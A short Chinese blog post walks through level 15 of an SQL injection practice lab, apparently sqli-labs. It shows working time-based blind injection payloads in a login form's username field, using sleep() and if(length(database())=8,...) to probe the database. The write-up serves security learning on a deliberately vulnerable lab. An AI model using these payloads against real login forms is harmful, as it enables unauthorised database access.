码迷,mamicode.com
首页 > 数据库 > 详细

SQLI DUMB SERIES-15

时间:2019-04-14 16:17:12      阅读:201      评论:0      收藏:0      [点我收藏+]

标签:方式   sql   base   图片   登录   测试   sleep   单引号   输入   

(1)无论输入什么都没有回显,但是输入 admin‘# 时会显示成功登录,说明闭合方式是单引号

技术图片

(2)无回显,则使用盲注,可用用时间延迟攻击法。

测试时间延迟是否可行:

uname=admin‘ and sleep(5) #&passwd=&submit=Submit

有明显延迟,测试成功。

(3)手工延迟注入与前面的手工注入相同,如爆库名

uname=admin‘ and if(length(database())=8,sleep(7),1)#&passwd=&submit=Submit

 技术图片

有明显延迟,说明库名为8位。

SQLI DUMB SERIES-15

标签:方式   sql   base   图片   登录   测试   sleep   单引号   输入   

原文地址:https://www.cnblogs.com/momoli/p/10705347.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!